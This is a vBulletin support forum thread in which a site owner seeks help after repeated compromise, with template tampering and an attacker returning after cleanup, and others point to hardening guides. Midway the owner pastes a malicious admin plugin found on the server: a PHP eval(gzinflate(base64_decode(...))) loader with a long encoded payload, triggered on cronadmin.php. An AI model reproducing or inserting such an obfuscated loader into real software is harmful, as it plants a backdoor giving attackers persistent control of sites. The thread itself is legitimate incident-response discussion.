How has a hacker been able to change my forum home template to point to his forum? I reverted the template and fixed the issue but I don't know how he got in or what to change to stop him from doing this. Please help

hydrocanna.com

You sure you cleaned out your site completely after you reported being hacked on Oct 4th?

i removed all the plugins that I felt were out of date

I removed the install folder after upgrading to 4.2.2

I changed all admin pw and cpanel pw

what am i missing?

Did you follow all the items in the following links thoroughly?

http://www.vbulletin.com/forum/blogs...ve-been-hacked (http://www.vbulletin.com/forum/blogs/zachery/3993888-fixing-your-site-after-you-have-been-hacked)

http://www.vbulletin.com/forum/blogs...vbulletin-site (http://www.vbulletin.com/forum/blogs/zachery/3993849-best-practices-for-securing-your-vbulletin-site)

I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if i should delete that many files. Its quite a bit a few of em. Do i need to look at my plugins next?

how was he able to change the forum home? are there that many entrances for him to use that we can't narrow it down ?

thank you so much for your help. Ive been battling this for months now. It has def killed my community

I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if i should delete that many files. Its quite a bit a few of em. Do i need to look at my plugins next?

how was he able to change the forum home? are there that many entrances for him to use that we can't narrow it down ?

thank you so much for your help. Ive been battling this for months now. It has def killed my communityIt's not only "narrowed down" it is explained explicitly, at the links provided.:D

Well I would follow everything in the guides, and then you should be good to go.

There is no way of knowing exactly how the forumhome was changed, but at least reverting is seems to have fixed it.

If you have not got any emails from vb.org about a potential exploit in any mods you are using, then you should be safe. You will only get the email if you have mods you are using, marked as installed.

i found that the hacker got into the admincp and edited a plugin that has this code in it

if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) {

eval(gzinflate(base64_decode('7X37d9s20ujP6Tn5HxCv t5K3tl6O28aJ3dryS45fsWQ7dpLjQ5GUxJgPlaQsK3v6/e13Bi+CT1FJ09373evdMiI4mBkMBoMBMADq9Z6pORdd0h2Ztv3 8h3p9d0Yu7IlDfiRv/dm4Z719/oPp+55/75tjzw8td1htrLx+/sM/9JFh+dVKBV/q9a7nmKSvBZZOHjW/Ejz/wRqQ6ovfl+8P93sfKmMtHFU+rZB/P/+BwN8yZCVbpG2bmrsHWIZmqE+N6gri+pOYdmDmQcbxIfjzH5Z9 zwtTcN39y+v9yw+VvfP21en+We/+8vy8x/IsG56jWS7AR2BHvd7F/dF5F0AQItB9axzGILrty85F7/5s53SfwQwmtn0/8e0Y1OX+u6v9bu/+6rKjYmoBEIjHdDXHrPI0ykpg+o8mvMVJ0X/vd/b2LhmSSZCCudw/Pe/tKzDTkac5FsAMJq4eWp57bz5ZQRhUl8ZeYD3dg5DH04llLK2Q3 0g8qSpfTXxbWSGbxHwy9eoSQ7q0sjABDv2hgiWufMpEaFiB1rd NA1BaroX5qxWedi9oBFzBLkwQdF/TH4juua6ph4RXUX9GTjx/D2H2Xd0zAB1ULcr655dk4PkI/2i6lunqJtDs62PAdB94E183gfBSZ7b/aLw/m520jsd969X07v1x0NlpvIU0u7NvX5x/Hvf6rTP/7v27XzC9M9sZdg52Z9r725edtvdH5m8Kt3t89XBw3tkf7b5rhA dX9unwqnHQ7jUvdy8bV8N3rVeTvnP92Wjvtm9vzvzOwZl3d/MUdNqAX/zH8Hzuty7tzuHxxvnD06P+8G6498773DkwgL+D2V135+fe4avZ Zbu5d3r47otuNc+v203d3HuYxnAt9t9Z2zodXt40R9rNlOHf3x 1rR2eNu5uD8MQ5e+x3GQzy0ofvd/u7vf7hwWdt3RjpzvWpdrPRNPe8R+3wVXjXfTXVnVeu7hyEkO4e t3eZnA8vP5+4uwErZyO86DUiuewfj25bwfCdAzhbl4/99c7wqjWy+4fToeGeDk+7L6cok84+k0m/dTvsXh/v9qzdzrurs5PL6+MeyHT33cOrq3dXxkFnr/HqpNtgskN6zesvtzeGfW7tPtzONqb99m6/e/jqi3HQGN40dx9199Lg9Q3lPDuAsgzvDk8nOtA/7XXWTz7vTE7bL586e52n08/7f40c9vZnZ7OXU4q7uzMDOk//GdkEf7zv7nbv3kM9H92N+44+pLLZ3xj1b64o3M1sbHT24buzYd +uXyLM5MR6GZdNhKunHx6s9x17cjfb7WmH10Gf6thZ/62tlOvw+qFz

the plugin has a lot more code that i cant post in here. is this plugin the hack they keep getting in from? I deleted this a week ago. how is it back?

here is the screen shot from the log. how does he not have a username?

I blocked the ip but im sure thats not a big deal

There is a hole somewhere. Could be a file hidden on your server. You need to thoroughly check every file and compare the dates, etc..
Make sure you follow the suggestions to a "T" that Ozzy linked.

There is a hole somewhere. Could be a file hidden on your server. You need to thoroughly check every file and compare the dates, etc..
Make sure you follow the suggestions to a "T" that Ozzy linked.


I have done all that already. I went through it all. I think it has to be a file but how do I find it

Did you go through all your files when you ran, Suspect File Versions?

Did you go through all your files when you ran, Suspect File Versions?


I have but i have no idea what to look for and im not sure what belongs or what I should delete. It's getting to where I want to hire someone but don't know who

I would post in the paid section then, just remember to follow this.

Before Selecting a User
Once you are contacted by a member offering to fulfill the request, do the following:

1. Search this forum along with http://www.vbulletin.com/forum/ and http://www.vbulletintemplates.com/ for post by that user and with that user's name. If the posts are generally helpful, then you are usually in good shape. If there are no posts in all three sites or there are a significant number of unhelpful or negative posts, be wary.

2. If appropriate, ask the user for past work examples (a "portfolio"). Note, however, that many service requests are very unique and cannot support a portfolio. Also, there is always an honest user who simply has not had enough jobs yet to build a portfolio.